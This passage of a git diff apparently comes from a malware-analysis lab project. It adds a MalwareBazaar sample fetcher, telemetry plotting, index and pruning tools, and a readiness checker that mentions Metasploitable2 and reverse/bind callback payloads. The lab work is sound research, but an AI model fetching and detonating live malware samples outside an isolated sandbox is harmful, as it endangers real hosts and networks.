||||
"warn",
|
||||
detail="optional — needed for Tier-3 episodes",
|
||||
fix="IMAGE_URL=… IMAGE_SHA256=… sudo /opt/cis490/scripts/fetch-metasploitable2.sh",
|
||||
))
|
||||
|
||||
|
||||
def check_bridge(report: Report) -> None:
|
||||
"""Bridge readiness — pcap (source 4) + reverse/bind callback
|
||||
payloads both need this. Without it, Tier-3 episodes that pick
|
||||
callback modules will fire but the session never lands."""
|
||||
rc, out, _ = _run(["ip", "-br", "link", "show", "br-malware"])
|
||||
if rc == 0 and "br-malware" in out:
|
||||
if "UP" in out or "UNKNOWN" in out:
|
||||
report.add(Check("bridge: br-malware up", "ok", detail=out.strip()[:80]))
|
||||
else:
|
||||
report.add(Check(
|
||||
"bridge: br-malware up",
|
||||
"warn",
|
||||
detail=out.strip()[:80],
|
||||
fix="sudo ip link set br-malware up",
|
||||
))
|
||||
else:
|
||||
report.add(Check(
|
||||
"bridge: br-malware exists",
|
||||
"warn",
|
||||
detail="optional — pcap capture + callback-payload Tier-3 "
|
||||
"modules require it",
|
||||
fix="sudo /opt/cis490/vm/setup_bridge.sh",
|
||||
))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — end to end (lab-host)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_end_to_end(report: Report) -> None:
|
||||
cfg = "/etc/cis490/lab-host.toml"
|
||||
if not _path_exists(Path(cfg)):
|
||||
report.add(Check("e2e: cis490-shipper --ping", "skip",
|
||||
detail="no lab-host.toml"))
|
||||
return
|
||||
rc, out, err = _run([
|
||||
"/opt/cis490/.venv/bin/python", "-m", "shipper",
|
||||
"--config", cfg, "--ping",
|
||||
], timeout=15.0)
|
||||
if rc == 0 and '"ok": true' in out:
|
||||
report.add(Check("e2e: cis490-shipper --ping", "ok",
|
||||
detail="200 OK"))
|
||||
else:
|
||||
report.add(Check(
|
||||
"e2e: cis490-shipper --ping",
|
||||
"fail",
|
||||
detail=(out or err)[:200],
|
||||
fix="paste this row's detail into a Forgejo issue or to the operator",
|
||||
))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# main
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def main(argv: list[str] | None = None) -> int:
|
||||
global _JSON_MODE
|
||||
p = argparse.ArgumentParser(prog="cis490-doctor")
|
||||
p.add_argument("--role", choices=("lab-host", "receiver"), default="lab-host")
|
||||
p.add_argument("--json", action="store_true",
|
||||
help="machine-readable output (suppresses progressive printing)")
|
||||
p.add_argument("--no-tier3", action="store_true",
|
||||
help="skip the optional Tier-3 prerequisite checks")
|
||||
args = p.parse_args(argv)
|
||||
_JSON_MODE = args.json
|
||||
|
||||
repo_root = Path(__file__).resolve().parent.parent
|
||||
if not _JSON_MODE:
|
||||
print(f"{_ANSI_BOLD}cis490-doctor{_ANSI_RESET} role={args.role} repo={repo_root}\n")
|
||||
|
||||
report = Report(role=args.role)
|
||||
check_repo(report, repo_root)
|
||||
check_install(report, args.role)
|
||||
if args.role == "lab-host":
|
||||
check_certs_lab_host(report)
|
||||
check_services(report, args.role)
|
||||
if args.role == "lab-host":
|
||||
check_network_lab_host(report, Path("/etc/cis490/lab-host.toml"))
|
||||
check_vm_prereqs(report)
|
||||
check_bridge(report)
|
||||
if not args.no_tier3:
|
||||
check_tier3(report)
|
||||
check_end_to_end(report)
|
||||
|
||||
summary = report.summary()
|
||||
if _JSON_MODE:
|
||||
json.dump(report.to_dict(), sys.stdout, indent=2)
|
||||
print()
|
||||
else:
|
||||
print()
|
||||
print(f"{_ANSI_BOLD}summary:{_ANSI_RESET} "
|
||||
f"{_ANSI_GREEN}{summary['ok']} ok{_ANSI_RESET}, "
|
||||
f"{_ANSI_YELLOW}{summary['warn']} warn{_ANSI_RESET}, "
|
||||
f"{_ANSI_RED}{summary['fail']} fail{_ANSI_RESET}, "
|
||||
f"{_ANSI_DIM}{summary['skip']} skip{_ANSI_RESET}")
|
||||
if summary["fail"]:
|
||||
print(
|
||||
f"\n{_ANSI_BOLD}{_ANSI_RED}NOT READY.{_ANSI_RESET} "
|
||||
"Run the `fix:` commands above in order, then re-run "
|
||||
"`cis490-doctor`. When all rows are green/yellow, "
|
||||
"episodes will start shipping to the Pi."
|
||||
)
|
||||
else:
|
||||
print(
|
||||
f"\n{_ANSI_BOLD}{_ANSI_GREEN}READY.{_ANSI_RESET} "
|
||||
"Episodes should be flowing. Watch:\n"
|
||||
" sudo journalctl -u cis490-shipper -f\n"
|
||||
" ssh <pi> 'sudo tail -f /var/lib/cis490/index.jsonl'"
|
||||
)
|
||||
|
||||
return 1 if summary["fail"] else 0
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
142
tools/fetch_sample.py
Normal file
142
tools/fetch_sample.py
Normal file
|
|
@ -0,0 +1,142 @@
|
|||
"""Fetch a malware sample by sha256 from MalwareBazaar.
|
||||
|
||||
Lands the binary at ``samples/store/<sha256>`` (gitignored), verifies
|
||||
the hash on the way in, and prints the resulting path on stdout.
|
||||
|
||||
Usage:
|
||||
|
||||
MALWAREBAZAAR_API_KEY=... uv run python tools/fetch_sample.py <sha256>
|
||||
|
||||
MalwareBazaar requires a free API key as of late 2023; sign up at
|
||||
https://bazaar.abuse.ch and either pass via env or place in
|
||||
``samples/.bazaar.token`` (mode 0600, gitignored). The downloaded
|
||||
zip is unencrypted by ``infected`` per the MB convention.
|
||||
|
||||
The fetcher is intentionally read-only over the network — no upload,
|
||||
no metadata posted — so a lab host with a tightly-egress-firewalled
|
||||
WG mesh can run it once on a build host and rsync the resulting
|
||||
``samples/store/`` directory across the fleet.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import hashlib
|
||||
import os
|
||||
import sys
|
||||
import urllib.parse
|
||||
import urllib.request
|
||||
import zipfile
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
MB_ENDPOINT = "https://mb-api.abuse.ch/api/v1/"
|
||||
MB_ZIP_PASSWORD = b"infected"
|
||||
|
||||
|
||||
def _read_api_key(repo_root: Path) -> str | None:
|
||||
env = os.environ.get("MALWAREBAZAAR_API_KEY")
|
||||
if env:
|
||||
return env.strip()
|
||||
token = repo_root / "samples" / ".bazaar.token"
|
||||
if token.exists():
|
||||
return token.read_text().strip()
|
||||
return None
|
||||
|
||||
|
||||
def fetch_sample(
|
||||
sha256: str,
|
||||
out_dir: Path,
|
||||
api_key: str,
|
||||
*,
|
||||
timeout_s: float = 60.0,
|
||||
) -> Path:
|
||||
if len(sha256) != 64 or not all(c in "0123456789abcdef" for c in sha256.lower()):
|
||||
raise ValueError(f"sha256 must be 64 hex chars, got {sha256!r}")
|
||||
sha256 = sha256.lower()
|
||||
out_dir.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
target = out_dir / sha256
|
||||
if target.exists():
|
||||
actual = hashlib.sha256(target.read_bytes()).hexdigest()
|
||||
if actual == sha256:
|
||||
return target
|
||||
target.unlink() # tampered or partial; refetch.
|
||||
|
||||
body = urllib.parse.urlencode({
|
||||
"query": "get_file",
|
||||
"sha256_hash": sha256,
|
||||
}).encode("utf-8")
|
||||
req = urllib.request.Request(
|
||||
MB_ENDPOINT,
|
||||
data=body,
|
||||
headers={
|
||||
"Auth-Key": api_key,
|
||||
"User-Agent": "cis490-fetcher/0",
|
||||
},
|
||||
method="POST",
|
||||
)
|
||||
with urllib.request.urlopen(req, timeout=timeout_s) as r:
|
||||
payload = r.read()
|
||||
|
||||
if not payload.startswith(b"PK"):
|
||||
raise RuntimeError(
|
||||
f"MalwareBazaar returned non-zip response (first 200 bytes): "
|
||||
f"{payload[:200]!r}"
|
||||
)
|
||||
|
||||
zip_path = out_dir / f"{sha256}.zip"
|
||||
zip_path.write_bytes(payload)
|
||||
try:
|
||||
with zipfile.ZipFile(zip_path) as zf:
|
||||
zf.setpassword(MB_ZIP_PASSWORD)
|
||||
names = zf.namelist()
|
||||
if not names:
|
||||
raise RuntimeError(f"{sha256}: empty zip")
|
||||
with zf.open(names[0]) as src, target.open("wb") as dst:
|
||||
dst.write(src.read())
|
||||
finally:
|
||||
zip_path.unlink(missing_ok=True)
|
||||
|
||||
actual = hashlib.sha256(target.read_bytes()).hexdigest()
|
||||
if actual != sha256:
|
||||
target.unlink()
|
||||
raise RuntimeError(f"sha256 mismatch: expected {sha256}, got {actual}")
|
||||
return target
|
||||
|
||||
|
||||
def main(argv: list[str] | None = None) -> int:
|
||||
p = argparse.ArgumentParser(prog="fetch_sample")
|
||||
p.add_argument("sha256")
|
||||
p.add_argument(
|
||||
"--out-dir",
|
||||
type=Path,
|
||||
default=None,
|
||||
help="Where to drop <sha256> (default: samples/store/ relative to repo)",
|
||||
)
|
||||
args = p.parse_args(argv)
|
||||
|
||||
repo_root = Path(__file__).resolve().parent.parent
|
||||
out_dir = args.out_dir or (repo_root / "samples" / "store")
|
||||
|
||||
api_key = _read_api_key(repo_root)
|
||||
if not api_key:
|
||||
print(
|
||||
"no MalwareBazaar API key — set MALWAREBAZAAR_API_KEY or write "
|
||||
"samples/.bazaar.token (mode 0600). Register at "
|
||||
"https://bazaar.abuse.ch.",
|
||||
file=sys.stderr,
|
||||
)
|
||||
return 2
|
||||
|
||||
try:
|
||||
path = fetch_sample(args.sha256, out_dir, api_key)
|
||||
except Exception as e:
|
||||
print(f"fetch failed: {e}", file=sys.stderr)
|
||||
return 1
|
||||
print(path)
|
||||
return 0
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
136
tools/index_reader.py
Normal file
136
tools/index_reader.py
Normal file
|
|
@ -0,0 +1,136 @@
|
|||
"""Read + filter the receiver's ``index.jsonl``.
|
||||
|
||||
Usage:
|
||||
|
||||
# All episodes from one host:
|
||||
cis490-index --host lab-host-1
|
||||
|
||||
# All episodes for a particular sample:
|
||||
cis490-index --sample xmrig-cryptominer
|
||||
|
||||
# Today's episodes, sorted by size:
|
||||
cis490-index --since 2026-04-30 --sort size
|
||||
|
||||
# Group/count by host:
|
||||
cis490-index --count-by host_id
|
||||
|
||||
The index file is the closest thing to a database the receiver has
|
||||
until we move to Postgres/Timescale. This tool is the temporary CLI
|
||||
view over it; it's intentionally read-only and never opens episode
|
||||
tarballs (just the index rows).
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import sys
|
||||
from collections import Counter
|
||||
from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
DEFAULT_INDEX = "/var/lib/cis490/index.jsonl"
|
||||
|
||||
|
||||
def _parse_since(s: str) -> datetime:
|
||||
# Accept ISO-8601 with or without time.
|
||||
for fmt in ("%Y-%m-%dT%H:%M:%S%z", "%Y-%m-%d", "%Y-%m-%dT%H:%M:%S"):
|
||||
try:
|
||||
dt = datetime.strptime(s, fmt)
|
||||
if dt.tzinfo is None:
|
||||
dt = dt.replace(tzinfo=timezone.utc)
|
||||
return dt
|
||||
except ValueError:
|
||||
continue
|
||||
# Last resort: fromisoformat which handles a wider range in 3.11+.
|
||||
dt = datetime.fromisoformat(s)
|
||||
if dt.tzinfo is None:
|
||||
dt = dt.replace(tzinfo=timezone.utc)
|
||||
return dt
|
||||
|
||||
|
||||
def _row_time(row: dict) -> datetime | None:
|
||||
s = row.get("received_at_wall")
|
||||
if not s:
|
||||
return None
|
||||
try:
|
||||
return datetime.fromisoformat(s.replace("Z", "+00:00"))
|
||||
except ValueError:
|
||||
return None
|
||||
|
||||
|
||||
def main(argv: list[str] | None = None) -> int:
|
||||
p = argparse.ArgumentParser(prog="cis490-index")
|
||||
p.add_argument("--index", default=DEFAULT_INDEX,
|
||||
help=f"path to index.jsonl (default {DEFAULT_INDEX})")
|
||||
p.add_argument("--host", help="only rows from this host_id")
|
||||
p.add_argument("--sample",
|
||||
help="only rows whose meta.sample.name matches "
|
||||
"(requires meta.json from a recent commit)")
|
||||
p.add_argument("--since", help="ISO date or datetime; only rows received on/after")
|
||||
p.add_argument("--until", help="ISO date or datetime; only rows received before")
|
||||
p.add_argument("--sort", choices=("time", "size", "host"), default="time")
|
||||
p.add_argument("--count-by",
|
||||
choices=("host_id", "schema_version"),
|
||||
help="instead of printing rows, group + count by this field")
|
||||
p.add_argument("--limit", type=int, default=0,
|
||||
help="cap output rows (0 = all)")
|
||||
args = p.parse_args(argv)
|
||||
|
||||
path = Path(args.index)
|
||||
if not path.exists():
|
||||
print(f"no index at {path}", file=sys.stderr)
|
||||
return 2
|
||||
|
||||
since = _parse_since(args.since) if args.since else None
|
||||
until = _parse_since(args.until) if args.until else None
|
||||
|
||||
rows: list[dict] = []
|
||||
with path.open() as f:
|
||||
for line in f:
|
||||
line = line.strip()
|
||||
if not line:
|
||||
continue
|
||||
try:
|
||||
row = json.loads(line)
|
||||
except json.JSONDecodeError:
|
||||
continue
|
||||
if args.host and row.get("host_id") != args.host:
|
||||
continue
|
||||
if since or until:
|
||||
t = _row_time(row)
|
||||
if t is None:
|
||||
continue
|
||||
if since and t < since:
|
||||
continue
|
||||
if until and t >= until:
|
||||
continue
|
||||
rows.append(row)
|
||||
|
||||
if args.count_by:
|
||||
counts = Counter(r.get(args.count_by, "<missing>") for r in rows)
|
||||
for k, n in counts.most_common():
|
||||
print(f"{n:>6} {k}")
|
||||
return 0
|
||||
|
||||
sort_keys = {
|
||||
"time": lambda r: r.get("received_at_wall", ""),
|
||||
"size": lambda r: r.get("size_bytes", 0),
|
||||
"host": lambda r: r.get("host_id", ""),
|
||||
}
|
||||
rows.sort(key=sort_keys[args.sort])
|
||||
if args.limit:
|
||||
rows = rows[-args.limit:] if args.sort != "size" else rows[:args.limit]
|
||||
|
||||
# Print TSV-ish for quick eyeballing + downstream pipe-friendliness.
|
||||
print("received_at_wall\thost_id\tepisode_id\tsize_bytes\tschema_version\tsha256")
|
||||
for r in rows:
|
||||
print("\t".join(str(r.get(k, "")) for k in
|
||||
("received_at_wall", "host_id", "episode_id",
|
||||
"size_bytes", "schema_version", "sha256")))
|
||||
return 0
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
|
|
@ -1,8 +1,19 @@
|
|||
"""Plot a single episode's envelope.
|
||||
|
||||
Reads ``telemetry-proc.jsonl`` and ``labels.jsonl`` from an episode directory
|
||||
and renders a 3-panel chart: CPU%, RSS, IO write rate, with phase bands
|
||||
underneath.
|
||||
Renders a multi-panel chart from whatever telemetry the episode dir
|
||||
contains, with phase bands underneath each panel:
|
||||
|
||||
panel 1 — host /proc CPU% (source 1, always)
|
||||
panel 2 — host /proc RSS (source 1, always)
|
||||
panel 3 — host /proc IO write (source 1, always)
|
||||
panel 4 — QMP block I/O ops (source 2, if telemetry-qmp.jsonl)
|
||||
panel 5 — perf IPC + miss-rate (source 3, if telemetry-perf.jsonl)
|
||||
panel 6 — bridge pcap pkts/s (source 4, if netflow.jsonl)
|
||||
panel 7 — guest agent CPU/load (source 5, if telemetry-guest.jsonl)
|
||||
|
||||
Missing sources are silently skipped — a Tier-1 episode dir with only
|
||||
proc telemetry still gets the original 3-panel plot. A Tier-3+ run
|
||||
with all five sources gets the full stack on a shared time axis.
|
||||
|
||||
Two modes:
|
||||
|
||||
|
|
@ -103,21 +114,77 @@ def main() -> int:
|
|||
end = labels[i + 1]["t_mono_ns"] / 1e9 if i + 1 < len(labels) else end_t
|
||||
spans.append((start, end, lbl["phase"]))
|
||||
|
||||
fig, axes = plt.subplots(3, 1, figsize=(13, 8), sharex=True)
|
||||
# Discover optional sources.
|
||||
qmp_rows = _load_jsonl(d / "telemetry-qmp.jsonl") if (d / "telemetry-qmp.jsonl").exists() else []
|
||||
perf_rows = _load_jsonl(d / "telemetry-perf.jsonl") if (d / "telemetry-perf.jsonl").exists() else []
|
||||
netflow_rows = _load_jsonl(d / "netflow.jsonl") if (d / "netflow.jsonl").exists() else []
|
||||
guest_rows = _load_jsonl(d / "telemetry-guest.jsonl") if (d / "telemetry-guest.jsonl").exists() else []
|
||||
|
||||
axes[0].plot(t, cpu_pct, color="#222222", linewidth=1.0)
|
||||
axes[0].set_ylabel("CPU %")
|
||||
axes[0].set_ylim(-3, 110)
|
||||
axes[0].grid(alpha=0.25)
|
||||
panels: list[tuple[str, callable]] = [] # (ylabel, plot_fn(ax))
|
||||
panels.append(("CPU % (proc)", lambda ax: (
|
||||
ax.plot(t, cpu_pct, color="#222222", linewidth=1.0),
|
||||
ax.set_ylim(-3, 110),
|
||||
)))
|
||||
panels.append(("RSS (MiB)", lambda ax: ax.plot(t, rss_mib, color="#222222", linewidth=1.0)))
|
||||
panels.append(("IO write (KiB/s)", lambda ax: ax.plot(t, io_kb_s, color="#222222", linewidth=1.0)))
|
||||
|
||||
axes[1].plot(t, rss_mib, color="#222222", linewidth=1.0)
|
||||
axes[1].set_ylabel("RSS (MiB)")
|
||||
axes[1].grid(alpha=0.25)
|
||||
if qmp_rows:
|
||||
qt = [r["t_mono_ns"] / 1e9 for r in qmp_rows]
|
||||
# Sum block I/O ops across devices.
|
||||
wr_ops = []
|
||||
rd_ops = []
|
||||
for r in qmp_rows:
|
||||
bs = r.get("blockstats") or {}
|
||||
wr_ops.append(sum(d.get("wr_ops", 0) for d in bs.values()))
|
||||
rd_ops.append(sum(d.get("rd_ops", 0) for d in bs.values()))
|
||||
panels.append(("QMP block ops (cum)", lambda ax: (
|
||||
ax.plot(qt, wr_ops, color="#cc4444", linewidth=1.0, label="wr_ops"),
|
||||
ax.plot(qt, rd_ops, color="#4488cc", linewidth=1.0, label="rd_ops"),
|
||||
ax.legend(loc="upper left", fontsize=8),
|
||||
)))
|
||||
|
||||
axes[2].plot(t, io_kb_s, color="#222222", linewidth=1.0)
|
||||
axes[2].set_ylabel("IO write (KiB/s)")
|
||||
axes[2].set_xlabel("time (s)")
|
||||
axes[2].grid(alpha=0.25)
|
||||
if perf_rows:
|
||||
pt = [r["t_mono_ns"] / 1e9 for r in perf_rows]
|
||||
ipc = [r.get("ipc") or 0 for r in perf_rows]
|
||||
miss = [r.get("cache_miss_rate") or 0 for r in perf_rows]
|
||||
panels.append(("perf IPC / miss-rate", lambda ax: (
|
||||
ax.plot(pt, ipc, color="#222222", linewidth=1.0, label="IPC"),
|
||||
ax.plot(pt, miss, color="#cc4444", linewidth=1.0, label="cache miss rate"),
|
||||
ax.legend(loc="upper right", fontsize=8),
|
||||
)))
|
||||
|
||||
if netflow_rows:
|
||||
nt = [r["t_mono_ns"] / 1e9 for r in netflow_rows]
|
||||
pkts = [(r.get("pkts_in", 0) + r.get("pkts_out", 0)) for r in netflow_rows]
|
||||
synf = [r.get("syn_count", 0) for r in netflow_rows]
|
||||
panels.append(("bridge pkts / SYNs (per 100 ms)", lambda ax: (
|
||||
ax.plot(nt, pkts, color="#222222", linewidth=1.0, label="pkts"),
|
||||
ax.plot(nt, synf, color="#cc4444", linewidth=1.0, label="syn"),
|
||||
ax.legend(loc="upper right", fontsize=8),
|
||||
)))
|
||||
|
||||
if guest_rows:
|
||||
gt = [r["t_mono_ns"] / 1e9 for r in guest_rows]
|
||||
load1 = [(r.get("load_1m_5m_15m") or [0])[0] for r in guest_rows]
|
||||
mem_used = [
|
||||
((r.get("mem_total_bytes") or 0) - (r.get("mem_available_bytes") or 0)) / (1024 * 1024)
|
||||
for r in guest_rows
|
||||
]
|
||||
panels.append(("guest load1 / mem_used (MiB)", lambda ax: (
|
||||
ax.plot(gt, load1, color="#222222", linewidth=1.0, label="load1"),
|
||||
ax.twinx().plot(gt, mem_used, color="#4488cc", linewidth=1.0, label="mem MiB"),
|
||||
)))
|
||||
|
||||
n = len(panels)
|
||||
fig, axes = plt.subplots(n, 1, figsize=(13, 2 + 1.6 * n), sharex=True)
|
||||
if n == 1:
|
||||
axes = [axes]
|
||||
|
||||
for ax, (ylabel, plot_fn) in zip(axes, panels):
|
||||
plot_fn(ax)
|
||||
ax.set_ylabel(ylabel)
|
||||
ax.grid(alpha=0.25)
|
||||
axes[-1].set_xlabel("time (s)")
|
||||
|
||||
for ax in axes:
|
||||
for start, end, phase in spans:
|
||||
|
|
|
|||
364
tools/prune_episodes.py
Normal file
364
tools/prune_episodes.py
Normal file
|
|
@ -0,0 +1,364 @@
|
|||
"""``cis490-prune`` — retroactively filter low-quality episodes from
|
||||
the receiver's dataset.
|
||||
|
||||
The signals that mark an episode as low-quality:
|
||||
|
||||
no-sample meta.sample is null. Pre-Sample-propagation code
|
||||
(commit a193d17 or earlier) ran the v1 yes-loop
|
||||
fallback regardless of what the fleet picked, so
|
||||
post-infection variety isn't recorded in meta.
|
||||
|
||||
no-workload-events events.jsonl has zero workload_* rows. Pre-audit-
|
||||
trail code (commit d86502d or earlier) ran with
|
||||
no event emission from VMLoadController, so we
|
||||
can't tell whether the workload actually fired.
|
||||
|
||||
workload-failed events.jsonl contains a workload_failed row. The
|
||||
SerialClient.run() raised mid-phase; the labels
|
||||
and telemetry don't match what the orchestrator
|
||||
was supposed to be doing.
|
||||
|
||||
workload-silent workload_killed event during the dormant phase
|
||||
has pre_kill_probe.yes == "0", meaning no
|
||||
``yes``-loop process was running when we tried
|
||||
to kill it. This is the elliott-lab fingerprint:
|
||||
the schedule walked but nothing fired in-guest.
|
||||
|
||||
flat-cpu /proc CPU% delta between phases is under 5
|
||||
percentage points across all phase boundaries.
|
||||
A model trained on these episodes can't
|
||||
distinguish phases.
|
||||
|
||||
Usage:
|
||||
cis490-prune # dry-run summary, no changes
|
||||
cis490-prune --reason no-sample # filter to one signal
|
||||
cis490-prune --archive # mv flagged episodes to
|
||||
# /var/lib/cis490/episodes-archive/
|
||||
cis490-prune --delete # rm flagged episodes + index rows
|
||||
|
||||
Run from the receiver's host where /var/lib/cis490/ lives. Operator
|
||||
runs as root because the episode store is owned by the cis490 user
|
||||
mode 0640.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import io
|
||||
import json
|
||||
import os
|
||||
import shutil
|
||||
import statistics
|
||||
import subprocess
|
||||
import sys
|
||||
import tarfile
|
||||
import tempfile
|
||||
from dataclasses import dataclass, field
|
||||
from pathlib import Path
|
||||
from typing import Iterator
|
||||
|
||||
|
||||
_REASONS = (
|
||||
"no-sample",
|
||||
"no-workload-events",
|
||||
"workload-failed",
|
||||
"workload-silent",
|
||||
"flat-cpu",
|
||||
)
|
||||
|
||||
|
||||
@dataclass
|
||||
class EpisodeQuality:
|
||||
host_id: str
|
||||
episode_id: str
|
||||
tar_path: Path
|
||||
size_bytes: int
|
||||
reasons: list[str] = field(default_factory=list)
|
||||
sample_name: str | None = None
|
||||
module_name: str | None = None
|
||||
|
||||
@property
|
||||
def fake(self) -> bool:
|
||||
return bool(self.reasons)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# tarball introspection
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _read_jsonl_from_tar(tar: tarfile.TarFile, name_suffix: str) -> list[dict]:
|
||||
"""Extract a JSONL member by name suffix (e.g. 'events.jsonl')."""
|
||||
for m in tar.getmembers():
|
||||
if m.name.endswith(name_suffix) and m.isfile():
|
||||
f = tar.extractfile(m)
|
||||
if f is None:
|
||||
return []
|
||||
text = f.read().decode("utf-8", errors="replace")
|
||||
return [json.loads(line) for line in text.splitlines() if line.strip()]
|
||||
return []
|
||||
|
||||
|
||||
def _read_meta_from_tar(tar: tarfile.TarFile) -> dict:
|
||||
for m in tar.getmembers():
|
||||
if m.name.endswith("meta.json") and m.isfile():
|
||||
f = tar.extractfile(m)
|
||||
if f is None:
|
||||
return {}
|
||||
return json.loads(f.read().decode("utf-8"))
|
||||
return {}
|
||||
|
||||
|
||||
def _decompress_zstd(zst_path: Path) -> bytes:
|
||||
"""Pure stdlib doesn't have zstd; shell out (already a project dep
|
||||
— install scripts require it)."""
|
||||
p = subprocess.run(
|
||||
["zstd", "-q", "-d", "--stdout", str(zst_path)],
|
||||
check=True, capture_output=True,
|
||||
)
|
||||
return p.stdout
|
||||
|
||||
|
||||
def classify_episode(tar_zst: Path, host_id: str, episode_id: str) -> EpisodeQuality:
|
||||
"""Open the tarball, scan meta + events + telemetry, return a
|
||||
quality verdict. Each signal is independent — an episode can hit
|
||||
multiple reasons (e.g. no-sample + workload-silent)."""
|
||||
q = EpisodeQuality(
|
||||
host_id=host_id,
|
||||
episode_id=episode_id,
|
||||
tar_path=tar_zst,
|
||||
size_bytes=tar_zst.stat().st_size,
|
||||
)
|
||||
|
||||
try:
|
||||
raw = _decompress_zstd(tar_zst)
|
||||
except (subprocess.CalledProcessError, OSError) as e:
|
||||
q.reasons.append(f"unreadable: {e}"[:80])
|
||||
return q
|
||||
|
||||
with tarfile.open(fileobj=io.BytesIO(raw)) as tar:
|
||||
meta = _read_meta_from_tar(tar)
|
||||
events = _read_jsonl_from_tar(tar, "events.jsonl")
|
||||
proc = _read_jsonl_from_tar(tar, "telemetry-proc.jsonl")
|
||||
labels = _read_jsonl_from_tar(tar, "labels.jsonl")
|
||||
|
||||
sample = meta.get("sample")
|
||||
if sample is None:
|
||||
q.reasons.append("no-sample")
|
||||
else:
|
||||
q.sample_name = sample.get("name")
|
||||
|
||||
exploit = meta.get("exploit")
|
||||
if exploit is not None:
|
||||
q.module_name = exploit.get("module_name")
|
||||
|
||||
workload_events = [e for e in events if str(e.get("event", "")).startswith("workload_")]
|
||||
if not workload_events:
|
||||
q.reasons.append("no-workload-events")
|
||||
if any(e.get("event") == "workload_failed" for e in events):
|
||||
q.reasons.append("workload-failed")
|
||||
|
||||
# workload-silent: dormant transition's probe shows no `yes` proc.
|
||||
for e in events:
|
||||
if e.get("event") != "workload_killed":
|
||||
continue
|
||||
if e.get("phase") != "dormant":
|
||||
continue
|
||||
probe = e.get("pre_kill_probe")
|
||||
if isinstance(probe, dict) and probe.get("yes") == "0":
|
||||
q.reasons.append("workload-silent")
|
||||
break
|
||||
|
||||
# flat-cpu: bucket /proc CPU% by phase, check inter-phase spread.
|
||||
if proc and labels:
|
||||
clk_tck = os.sysconf("SC_CLK_TCK")
|
||||
|
||||
def phase_at(t_ns: int) -> str:
|
||||
cur = "(pre)"
|
||||
for l in labels:
|
||||
if l["t_mono_ns"] <= t_ns:
|
||||
cur = l["phase"]
|
||||
else:
|
||||
break
|
||||
return cur
|
||||
|
||||
per_phase: dict[str, list[float]] = {}
|
||||
prev = None
|
||||
for r in proc:
|
||||
if prev is not None:
|
||||
dt = (r["t_mono_ns"] - prev["t_mono_ns"]) / 1e9
|
||||
if dt > 0:
|
||||
djiff = (r["cpu_user_jiffies"] + r["cpu_sys_jiffies"]) - \
|
||||
(prev["cpu_user_jiffies"] + prev["cpu_sys_jiffies"])
|
||||
pct = 100.0 * (djiff / clk_tck) / dt
|
||||
per_phase.setdefault(phase_at(r["t_mono_ns"]), []).append(pct)
|
||||
prev = r
|
||||
if per_phase:
|
||||
medians = [statistics.median(v) for v in per_phase.values() if v]
|
||||
if medians and (max(medians) - min(medians)) < 5.0:
|
||||
q.reasons.append("flat-cpu")
|
||||
|
||||
return q
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Index walking + actions
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def walk_index(index_path: Path, episodes_root: Path) -> Iterator[tuple[dict, Path]]:
|
||||
if not index_path.exists():
|
||||
return
|
||||
for line in index_path.read_text().splitlines():
|
||||
if not line.strip():
|
||||
continue
|
||||
try:
|
||||
row = json.loads(line)
|
||||
except json.JSONDecodeError:
|
||||
continue
|
||||
host = row.get("host_id", "")
|
||||
ep = row.get("episode_id", "")
|
||||
if not host or not ep:
|
||||
continue
|
||||
tar = episodes_root / host / f"{ep}.tar.zst"
|
||||
if not tar.exists():
|
||||
continue
|
||||
yield row, tar
|
||||
|
||||
|
||||
def apply_action(
|
||||
quals: list[EpisodeQuality],
|
||||
*,
|
||||
action: str,
|
||||
archive_root: Path,
|
||||
index_path: Path,
|
||||
) -> None:
|
||||
"""Carry out --delete or --archive on flagged episodes + drop
|
||||
matching rows from index.jsonl. Atomic-ish: index rewrite is
|
||||
single-shot after all tarballs are handled."""
|
||||
if action not in ("delete", "archive"):
|
||||
return
|
||||
flagged_ids = {q.episode_id for q in quals if q.fake}
|
||||
if not flagged_ids:
|
||||
return
|
||||
|
||||
if action == "archive":
|
||||
archive_root.mkdir(parents=True, exist_ok=True)
|
||||
for q in quals:
|
||||
if not q.fake:
|
||||
continue
|
||||
if action == "archive":
|
||||
target = archive_root / q.host_id
|
||||
target.mkdir(parents=True, exist_ok=True)
|
||||
shutil.move(str(q.tar_path), target / q.tar_path.name)
|
||||
elif action == "delete":
|
||||
q.tar_path.unlink(missing_ok=True)
|
||||
|
||||
if index_path.exists():
|
||||
kept = []
|
||||
for line in index_path.read_text().splitlines():
|
||||
try:
|
||||
row = json.loads(line)
|
||||
except json.JSONDecodeError:
|
||||
kept.append(line)
|
||||
continue
|
||||
if row.get("episode_id") in flagged_ids:
|
||||
continue
|
||||
kept.append(line)
|
||||
# Rewrite via tempfile + replace so a crash mid-write doesn't
|
||||
# corrupt the live index.
|
||||
tmp = index_path.with_suffix(".jsonl.partial")
|
||||
tmp.write_text("\n".join(kept) + ("\n" if kept else ""))
|
||||
os.replace(tmp, index_path)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# CLI
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def main(argv: list[str] | None = None) -> int:
|
||||
p = argparse.ArgumentParser(prog="cis490-prune")
|
||||
p.add_argument("--episodes-root", type=Path,
|
||||
default=Path("/var/lib/cis490/episodes"))
|
||||
p.add_argument("--index", type=Path,
|
||||
